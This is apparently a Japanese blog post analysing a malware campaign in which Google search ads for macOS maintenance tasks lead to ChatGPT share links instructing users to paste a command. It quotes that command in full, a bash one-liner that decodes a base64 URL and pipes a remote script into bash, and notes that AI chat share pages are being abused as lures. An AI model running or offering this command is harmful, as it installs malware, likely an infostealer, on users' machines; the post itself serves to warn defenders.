macos系で「～をする方法」みたいなのを検索するとchatgptやgrokなどの生成AIの共有リンクが、Googleの広告リンクに出てくるらしい。

そこで、示されているコマンドを実行するとマルウェアをダウンロードして実行してしまう。

広告リンクの表示ドメイン、最終遷移先のドメイン自体は本物の生成AIのリンク。悪いのは、実行を促されるコマンド自体。

そのため、検索結果で出てきたものが正しいか確認しないのであれば、信じて実行してしまうと。

なんだか、ClickFix味を感じさせる内容だ。

macosのシステム設定に関する検索結果で多い？

「how to clear storage on mac」や「Clear disk space on macOS」だったり、音声の設定変更などのmacosに関する検索結果にchatgptの共有リンクが広告リンクとして表示される。

そのうちの一つを開くと、コマンドを実行するような指示が書かれている。そのコマンドを実行すれば、問題が解決するというような案内がある。

例えば以下のようなコマンドが示される。

/bin/bash -c "$(curl —fsSL $(echo aHR0cHM6Ly9wdXR1YXJ0YW5hLmNvbS9jbGVhbmdwdA== | base64 -d))"

これは、実質curlでダウンロードしたコンテンツの内容をbash スクリプトとして解釈して実行するコマンド。

aHR0cHM6Ly9wdXR1YXJ0YW5hLmNvbS9jbGVhbmdwdA==の部分はbase64でエンコードされており、デコードするとhttps[:]//putuartana[.]com/cleangptになる。

つまり、putuartana[.]comから取得した何らかのスクリプトを実行している。残念ながら、この記事作成時点では既に404となってしまっていた。

おそらく、このコマンドから最終的にインフォスティーラーとかがダウンロードされて実行されてしまうということ。

所感

「AIで作られた記事が量産されて中身が検証されていない出来の悪いものばかりになっているのがインターネットの汚染」とよく言われるようになった世の中。

それでも気にせずに中身を自分で検証せずに実行している人々も居ます。

その状況を上手くつかってマルウェア配布に使用している一派がいるという感じか。

ていうか、広告って自分が所有していないドメインのURLも登録できるんだ。ニッチなキーワードだけど、マルウェアの配信のための行動としてクリティカルなものであれば、上手く上位に表示されてしまっているという状況？

Gensparkの共有リンクが最近検索に表示されるようになってきたなぁと思っていたが、この中身もどこかではマルウェア配信みたいに使われているような気がしてきた。